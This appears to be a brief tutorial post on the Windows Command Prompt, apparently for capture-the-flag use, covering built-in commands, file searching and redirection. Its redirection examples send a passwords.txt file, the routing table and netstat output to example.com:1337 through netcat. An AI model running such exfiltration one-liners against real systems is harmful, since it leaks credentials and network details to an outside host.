---
title: Windows Command Prompt
category: windows
layout: post
---

The Windows Command Prompt, or cmd, is not known for being a great terminal.
However, it's installed on every system of Windows imaginable, so it's good to know.
If the option is available, however, you should probably take PowerShell over cmd.
Provided here is a quick guide.
Remember: if you don't know a command, try `command /?`!

## Basic Commands
Type in `help` to see a list of the common built-in commands.

Other built-in tools:
```
dir      - list a directory
find     - search input for text
type     - show the contents of a file
findstr  - search a set of files for text
ipconfig - display IP configuration
nslookup - look up DNS name
route    - edit/display the routing table - e.g. route print
attrib   - list file attributes
cacls    - edit file ACLs, use icacls on newer systems
```

## Common Examples
List all files under `directory`:
```
dir /a /s /b <directory>
```

Find all files containing the term `flag`, case-insensitively:
```
dir /a /s /b <directory> | find /i "flag"
```

## Redirection
It's important to understand that each program has 2 outputs and 1 input.
The input is called "standard in" (stdin), and the two outputs are called "standard out" (stdout) and "standard error" (stderr).
Stdout is the typical output of the program.
Stderr is non-typical output of the program that the user should probably see.
Stdin is what goes into the program.

By default, all of these are from the console itself.
Stdout will end up on the console, stdin will be what's typed in, etc.
This can be changed with redirection.

`< filename` will set the stdin of the program to a file:
```
C:\> nc example.com 1337 < passwords.txt
```

`> filename` will set the stdout of the program to a file:
```
C:\> ipconfig > network_config.txt
```

Piping with the `|` character chains commands so the stdout of the left side becomes the stdin of the right side:
```
C:\> route print | nc example.com 1337
```

`2>&1` sets the stderr of the program to be the same destination as stdout.
This primarily has the use of piping both stdout and stderr.
```
C:\> netstat -ano 2>&1 | nc example.com 1337
```
